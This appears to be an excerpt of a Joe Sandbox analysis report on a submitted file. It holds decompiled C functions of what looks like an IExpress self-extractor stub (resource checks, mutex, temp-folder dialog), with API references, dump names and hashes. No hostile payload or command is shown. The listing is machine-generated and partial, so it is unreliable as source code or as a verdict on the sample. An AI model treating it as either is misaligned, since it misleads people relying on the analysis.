                                                                                                                                                                                                    0x00177165
                                                                                                                                                                                                    0x00177178
                                                                                                                                                                                                    0x00177182
                                                                                                                                                                                                    0x0017718e
                                                                                                                                                                                                    0x00177197
                                                                                                                                                                                                    0x001771a0
                                                                                                                                                                                                    0x001771b1
                                                                                                                                                                                                    0x001771b8
                                                                                                                                                                                                    0x001771c4
                                                                                                                                                                                                    0x001771c7
                                                                                                                                                                                                    0x001771cb
                                                                                                                                                                                                    0x001771d5
                                                                                                                                                                                                    0x001771da
                                                                                                                                                                                                    0x001771da
                                                                                                                                                                                                    0x001771dc
                                                                                                                                                                                                    0x001771dc
                                                                                                                                                                                                    0x001771e2
                                                                                                                                                                                                    0x001771e5
                                                                                                                                                                                                    0x001771ee

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177182
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00177191
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0017719A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 001771A3
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001771B8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: 50a781b9a1fde4d67c0ffc6bb4a6f2dee1f8ac3c345a617be8131199d69ed070
                                                                                                                                                                                                    • Instruction ID: a4dd4aa6012746cb98047efacc8bee2e5a7d71a1548b22a44b73754b943c1191
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50a781b9a1fde4d67c0ffc6bb4a6f2dee1f8ac3c345a617be8131199d69ed070
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62111C71D05208DFDB10DFB8DA48A9EBBF4EF48315FA14865E809E7650EB309A85CB41
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00176CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00176cf7
                                                                                                                                                                                                    0x00176d00
                                                                                                                                                                                                    0x00176d19

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00176E26,00171000), ref: 00176CF7
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00176E26,?,00176E26,00171000), ref: 00176D00
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00176E26,00171000), ref: 00176D0B
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00176E26,00171000), ref: 00176D12
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                    • Opcode ID: 9cc47881b8a41a59bebf700964881e9653d57c0aa55632d781fb074185843b6e
                                                                                                                                                                                                    • Instruction ID: 2fa8253dd6a7b20525d8e98630192cb6bd260bb7320e6c5590bdbf8aac992950
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cc47881b8a41a59bebf700964881e9653d57c0aa55632d781fb074185843b6e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3D0CA32040208BBFB002BE1EC0CA5D3F38EFC8222FC84000F31E82820CA3288D1CB62
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                    			E00173210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					E001743D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                    					SetWindowTextA(_t64, "nst0dum");
                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                    					__eflags =  *0x179a40 - _t42; // 0x3
                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1791e4, 0x104);
                                                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							_t58 = 0x4bf;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E001744B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0x1791e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0x1791e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0x1791e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0x1791e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0x1791e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E0017658A(0x1791e4, 0x104, 0x171140);
                                                                                                                                                                                                    								_t27 = E001758C8(0x1791e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0x1791e4 - 0x5c;
                                                                                                                                                                                                    									if( *0x1791e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E0017597D(0x1791e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x1791e5 - 0x5c;
                                                                                                                                                                                                    									if( *0x1791e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E001744B9(_t64, 0x54a, 0x1791e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0x1791e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x1791e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0x1791e4 - 0x5c;
                                                                                                                                                                                                    						if( *0x1791e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                    						 *0x179124 = 0x800704c7;
                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t37 = LoadStringA( *0x179a3c, 0x3e8, 0x178598, 0x200);
                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                    						_t38 = E00174224(_t64, _t46, _t46);
                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1787a0);
                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						E001744B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}

























                                                                                                                                                                                                    0x0017321b
                                                                                                                                                                                                    0x0017321e
                                                                                                                                                                                                    0x00173221
                                                                                                                                                                                                    0x0017343c
                                                                                                                                                                                                    0x0017343e
                                                                                                                                                                                                    0x0017343f
                                                                                                                                                                                                    0x00173445
                                                                                                                                                                                                    0x00173447
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173447
                                                                                                                                                                                                    0x00173229
                                                                                                                                                                                                    0x0017322a
                                                                                                                                                                                                    0x0017322f
                                                                                                                                                                                                    0x001733ec
                                                                                                                                                                                                    0x001733f7
                                                                                                                                                                                                    0x00173410
                                                                                                                                                                                                    0x00173416
                                                                                                                                                                                                    0x0017341d
                                                                                                                                                                                                    0x0017342d
                                                                                                                                                                                                    0x0017342d
                                                                                                                                                                                                    0x00173438
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173438
                                                                                                                                                                                                    0x00173237
                                                                                                                                                                                                    0x00173243
                                                                                                                                                                                                    0x00173243
                                                                                                                                                                                                    0x00173246
                                                                                                                                                                                                    0x001732ee
                                                                                                                                                                                                    0x001732f4
                                                                                                                                                                                                    0x001732f6
                                                                                                                                                                                                    0x001733d4
                                                                                                                                                                                                    0x001733d6
                                                                                                                                                                                                    0x001733db
                                                                                                                                                                                                    0x001733dc
                                                                                                                                                                                                    0x001733de
                                                                                                                                                                                                    0x001733df
                                                                                                                                                                                                    0x00173370
                                                                                                                                                                                                    0x00173372
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173372
                                                                                                                                                                                                    0x001732fc
                                                                                                                                                                                                    0x00173301
                                                                                                                                                                                                    0x00173301
                                                                                                                                                                                                    0x00173303
                                                                                                                                                                                                    0x00173304
                                                                                                                                                                                                    0x00173304
                                                                                                                                                                                                    0x0017330a
                                                                                                                                                                                                    0x0017330d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173313
                                                                                                                                                                                                    0x00173318
                                                                                                                                                                                                    0x0017331a
                                                                                                                                                                                                    0x00173331
                                                                                                                                                                                                    0x00173332
                                                                                                                                                                                                    0x0017333a
                                                                                                                                                                                                    0x0017333d
                                                                                                                                                                                                    0x0017337c
                                                                                                                                                                                                    0x00173388
                                                                                                                                                                                                    0x0017338f
                                                                                                                                                                                                    0x00173394
                                                                                                                                                                                                    0x00173396
                                                                                                                                                                                                    0x001733a4
                                                                                                                                                                                                    0x001733ab
                                                                                                                                                                                                    0x001733b6
                                                                                                                                                                                                    0x001733be
                                                                                                                                                                                                    0x001733c3
                                                                                                                                                                                                    0x001733c5
                                                                                                                                                                                                    0x00173435
                                                                                                                                                                                                    0x00173437
                                                                                                                                                                                                    0x00173437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173437
                                                                                                                                                                                                    0x001733c7
                                                                                                                                                                                                    0x001733c9
                                                                                                                                                                                                    0x001733cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001733cc
                                                                                                                                                                                                    0x001733ad
                                                                                                                                                                                                    0x001733b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001733b4
                                                                                                                                                                                                    0x00173398
                                                                                                                                                                                                    0x00173399
                                                                                                                                                                                                    0x0017339b
                                                                                                                                                                                                    0x0017339c
                                                                                                                                                                                                    0x0017339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017339d
                                                                                                                                                                                                    0x0017334c
                                                                                                                                                                                                    0x00173351
                                                                                                                                                                                                    0x00173354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017335c
                                                                                                                                                                                                    0x00173362
                                                                                                                                                                                                    0x00173364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173366
                                                                                                                                                                                                    0x00173367
                                                                                                                                                                                                    0x00173369
                                                                                                                                                                                                    0x0017336a
                                                                                                                                                                                                    0x0017336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017336b
                                                                                                                                                                                                    0x0017331c
                                                                                                                                                                                                    0x00173323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173329
                                                                                                                                                                                                    0x0017332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017332b
                                                                                                                                                                                                    0x0017324c
                                                                                                                                                                                                    0x0017324c
                                                                                                                                                                                                    0x0017324f
                                                                                                                                                                                                    0x001732c8
                                                                                                                                                                                                    0x001732ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001732ce
                                                                                                                                                                                                    0x00173251
                                                                                                                                                                                                    0x00173256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173271
                                                                                                                                                                                                    0x00173277
                                                                                                                                                                                                    0x00173279
                                                                                                                                                                                                    0x00173298
                                                                                                                                                                                                    0x0017329d
                                                                                                                                                                                                    0x0017329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001732b0
                                                                                                                                                                                                    0x001732b6
                                                                                                                                                                                                    0x001732b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001732be
                                                                                                                                                                                                    0x00173280
                                                                                                                                                                                                    0x00173289
                                                                                                                                                                                                    0x0017328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017328e
                                                                                                                                                                                                    0x0017327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017327b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00178598,00000200), ref: 00173271
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001733E2
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 001733F7
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00173410
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00173426
                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0017342D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0017343F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$nst0dum
                                                                                                                                                                                                    • API String ID: 2418873061-4205370855
                                                                                                                                                                                                    • Opcode ID: d83bbe9100fc464b785b0d2ce3c9246104c2138a91b805f24f4bea5bce800dbd
                                                                                                                                                                                                    • Instruction ID: 4d55210f080e0abecee1e104d8e7311acb21cbae98cbcc04f2d1010bc59e0ec9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d83bbe9100fc464b785b0d2ce3c9246104c2138a91b805f24f4bea5bce800dbd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F51473038024077FB351B355C8CF7F2A79AF96B51F90C028F66EA65C1CBA48AC1B261
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00172CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				struct HRSRC__* _t31;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t13 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                    				_t65 = 0;
                                                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                                                    				_t48 = __edx;
                                                                                                                                                                                                    				 *0x179a3c = __ecx;
                                                                                                                                                                                                    				memset(0x179140, 0, 0x8fc);
                                                                                                                                                                                                    				memset(0x178a20, 0, 0x32c);
                                                                                                                                                                                                    				memset(0x1788c0, 0, 0x104);
                                                                                                                                                                                                    				 *0x1793ec = 1;
                                                                                                                                                                                                    				_t20 = E0017468F("TITLE", 0x179154, 0x7f);
                                                                                                                                                                                                    				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                    					_t64 = 0x4b1;
                                                                                                                                                                                                    					goto L32;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                    					 *0x17858c = _t27;
                                                                                                                                                                                                    					SetEvent(_t27);
                                                                                                                                                                                                    					_t64 = 0x179a34;
                                                                                                                                                                                                    					if(E0017468F("EXTRACTOPT", 0x179a34, 4) != 0) {
                                                                                                                                                                                                    						if(( *0x179a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                    							 *0x179120 =  *0x179120 & _t65;
                                                                                                                                                                                                    							if(E00175C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                    								if( *0x178a3a == 0) {
                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x178184 != 0) {
                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if( *0x178a24 == 0) {
                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                    										if(E001736EE(_t65) == 0) {
                                                                                                                                                                                                    											goto L33;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t33 =  *0x179a40; // 0x3
                                                                                                                                                                                                    											_t48 = 1;
                                                                                                                                                                                                    											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                    												if(( *0x179a34 & 0x00000100) == 0 || ( *0x178a38 & 0x00000001) != 0 || E001718A3(_t64, _t66) != 0) {
                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													_t64 = 0x7d6;
                                                                                                                                                                                                    													if(E00176517(_t57, 0x7d6, _t34, E001719E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                    														goto L33;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00172390(0x178a3a);
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t64 = 0x520;
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								E001744B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t64 =  &_v268;
                                                                                                                                                                                                    							if(E0017468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    								goto L3;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                    								 *0x178588 = _t43;
                                                                                                                                                                                                    								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(( *0x179a34 & 0x00000080) == 0) {
                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                    										if(E001744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                    										E001744B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										CloseHandle( *0x178588);
                                                                                                                                                                                                    										 *0x179124 = 0x800700b7;
                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                    						E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						 *0x179124 = 0x80070714;
                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00172cb5
                                                                                                                                                                                                    0x00172cbc
                                                                                                                                                                                                    0x00172cc7
                                                                                                                                                                                                    0x00172cc9
                                                                                                                                                                                                    0x00172cd1
                                                                                                                                                                                                    0x00172cd3
                                                                                                                                                                                                    0x00172cd9
                                                                                                                                                                                                    0x00172ce9
                                                                                                                                                                                                    0x00172cf9
                                                                                                                                                                                                    0x00172d0e
                                                                                                                                                                                                    0x00172d15
                                                                                                                                                                                                    0x00172d1c
                                                                                                                                                                                                    0x00172ef3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172d2d
